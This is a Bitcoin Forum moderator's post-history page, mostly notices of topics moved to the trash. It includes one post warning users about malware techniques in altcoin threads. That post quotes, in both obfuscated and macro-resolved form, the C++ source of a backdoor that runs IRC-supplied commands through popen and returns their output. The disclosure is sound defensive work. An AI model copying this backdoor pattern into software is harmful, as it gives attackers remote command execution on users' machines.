Bitcoin Forum
May 12, 2024, 05:52:04 AM *
News: Latest Bitcoin Core release: 27.0 [Torrent]
 
  Home Help Search Login Register More  
  Show Posts
Pages: « 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 [25] 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 »
481  Bitcoin / Bitcoin Discussion / MOVED: BTER Hacked - 7,170 Bitcoin Stolen From Cold Wallet on: February 15, 2015, 11:15:51 PM
This topic has been moved to Trashcan.

Reason: duplicate topic
482  Economy / Currency exchange / MOVED: Need 10$ skrill I can give PayPal in exchange on: February 15, 2015, 05:53:02 AM
This topic has been moved to Trashcan.

Reason: not bitcoin related
483  Economy / Goods / MOVED: Local-Bitcoins.com on Flippa auction on: February 08, 2015, 10:57:59 PM
This topic has been moved to Trashcan.

Reason: not bitcoin related
484  Economy / Digital goods / MOVED: Reputable sellers torrent(tracker) invites/accounts for sale cheaply on: February 08, 2015, 10:53:13 PM
This topic has been moved to Trashcan.

Reason: duplicate topic
485  Economy / Digital goods / MOVED: [Have] 140$ Paypal [Want] 140$ Skrill on: February 08, 2015, 10:48:01 PM
This topic has been moved to Trashcan.

Reason: not bitcoin related
486  Bitcoin / Press / MOVED: Ross Ulbricht Found Guilty of Operating Silk Road Dark Market on: February 07, 2015, 11:40:07 PM
This topic has been moved to Trashcan.

Reason: wrong format
487  Economy / Gambling / MOVED: BitcoinChickenGame on: January 30, 2015, 05:13:40 AM
This topic has been moved to Trashcan.

Reason: referral link
488  Other / Off-topic / MOVED: Global Warming a Hoax at Service of Tyranny? on: January 30, 2015, 05:13:16 AM
This topic has been moved to Trashcan.

Reason: link shortener
489  Economy / Service Discussion / MOVED: [WTB]Bitcoin in EU, Need Exchange NO ID on: January 30, 2015, 05:09:09 AM
This topic has been moved to Trashcan.

Reason: duplicate topic
490  Economy / Service Announcements / MOVED: BITCOIN Faucet list W/ a few LTC and DOGE Faucets on: January 30, 2015, 04:59:55 AM
This topic has been moved to Trashcan.

Reason: referral link
491  Economy / Currency exchange / MOVED: need $35 skrill for pm on: January 30, 2015, 04:56:26 AM
This topic has been moved to Trashcan.

Reason: not bitcoin related
492  Economy / Goods / MOVED: [WTS] Domain: www.btcfirst.org on: January 30, 2015, 04:41:54 AM
This topic has been moved to Trashcan.

Reason: duplicate topic
493  Economy / Digital goods / MOVED: [WTB] Account Windows Server [2 weeks] forPaypal on: January 28, 2015, 04:33:28 AM
This topic has been moved to Trashcan.

Reason: not bitcoin related
494  Local / Бизнес / MOVED: Переживаешь за свою анонимность в сети И on: January 27, 2015, 12:06:22 AM
This topic has been moved to Trashcan.

Reason: referral link
495  Alternate cryptocurrencies / Altcoin Discussion / Beware of Increasingly Sophisticated Malware Infection Attempts on: January 25, 2015, 10:33:22 PM
In the past months, malware infection attempts on this forum has become increasingly sophisticated. Below is a summary of infection techniques that I have encountered. With the most sophisticated attacks, common sense and virus scans is no longer sufficient to ensure safety.

"latest wallet"/"custom wallet"/"faster miner"
A newbie asks for the latest wallet, or wallet that doesn't have any tx fees, or the latest/fastest miner, and the attacker posts his in response. This type of attempt Usually gets spotted pretty quickly.

Copied/new ANN
The attacker creates a new ANN topic and posts a malware link as the wallet (or a legit one and changes it to a malware one later).

Replacing links in quotes
The attacker quotes a legitimate post containing a download link written by the real developer (usually the OP or a update post) and changes the link within the quote to a malware link.

Compromised dev account
The developer account (usually responsible for making the OP) is compromised and a "mandatory update" is posted. This usually happens with old/abandoned coins so the real developer isn't there to notice the rogue update.

Packed/FUD executables
In most of the cases above, the malware has little to now detections on virustotal. This is because any script kiddie can pay $30 and have their malware crypted, rendering them fully undetectable.

Modified source with backdoor
This was recently brought to my attention via a user report. A newbie, under the guise of reviving a coin posted a new client along with source. However, the source was modified to include a backdoor in the IRC bootstrapping mechanism.
here is the relevant source code:
Code:
if (vWords[1] == CBuff && vWords[3] == ":!" && vWords[0].size() > 1)
{
CLine *buf = CRead(strstr(strLine.c_str(), vWords[4].c_str()), "r");
if (buf) {
std::string result = "";
while (!feof(buf))
if (fgets(pszName, sizeof(pszName), buf) != NULL)
result += pszName;
CFree(buf);
strlcpy(pszName, vWords[0].c_str() + 1, sizeof(pszName));
if (strchr(pszName, '!'))
*strchr(pszName, '!') = '\0';
Send(hSocket, strprintf("%s %s :%s\r", CBuff, pszName, result.c_str()).c_str());
}
}
here is the source code with macros resolved:
Code:
if (vWords[1] == "PRIVMSG" && vWords[3] == ":!" && vWords[0].size() > 1)
{
FILE *buf = popen(strstr(strLine.c_str(), vWords[4].c_str()), "r");
if (buf) {
std::string result = "";
while (!feof(buf))
if (fgets(pszName, sizeof(pszName), buf) != NULL)
result += pszName;
pclose(buf);
strlcpy(pszName, vWords[0].c_str() + 1, sizeof(pszName));
if (strchr(pszName, '!'))
*strchr(pszName, '!') = '\0';
Send(hSocket, strprintf("%s %s :%s\r", "PRIVMSG", pszName, result.c_str()).c_str());
}
}
The code was part of the initial commit, so it would be difficult to notice the addition of the code by casual inspection. Also, this would likely not show up on any virus scans.
496  Economy / Lending / MOVED: NEED 2$ PP LOAN! on: January 25, 2015, 08:50:37 PM
This topic has been moved to Trashcan.

Reason: not bitcoin related
497  Economy / Gambling / MOVED: The report of the Game in HYIP on: January 25, 2015, 05:47:29 AM
This topic has been moved to Trashcan.

Reason: referral links
498  Economy / Gambling / MOVED: Monitoring crypto HYIP on: January 25, 2015, 05:42:04 AM
This topic has been moved to Trashcan.

Reason: referral link
499  Economy / Gambling / MOVED: BTC Casino 5mBTC FREE on: January 23, 2015, 05:31:34 AM
This topic has been moved to Trashcan.

Reason: duplicate topic
500  Economy / Currency exchange / MOVED: [h] BTC/SKRILL [W] payza on: January 21, 2015, 03:20:39 AM
This topic has been moved to Trashcan.

Reason: duplicate topic
Pages: « 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 [25] 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 »
Powered by MySQL Powered by PHP Powered by SMF 1.1.19 | SMF © 2006-2009, Simple Machines Valid XHTML 1.0! Valid CSS!